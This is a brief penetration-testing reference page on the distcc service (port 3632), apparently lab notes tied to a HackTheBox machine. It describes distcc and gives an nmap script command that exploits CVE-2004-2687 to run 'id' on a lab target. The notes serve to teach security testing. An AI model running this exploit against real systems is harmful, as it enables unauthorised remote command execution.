DISTCC (3632)

Information

distcc is a distributed compilation tool that allows code to be compiled across multiple machines in a network with the goal of significantly reducing compilation time via workload distribution.

Exploitation

Based on CVE-2004-2687.

sudo nmap -p3632 10.10.10.3 --script=distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

For an example of exploiting distcc see Lame.

Last updated

Was this helpful?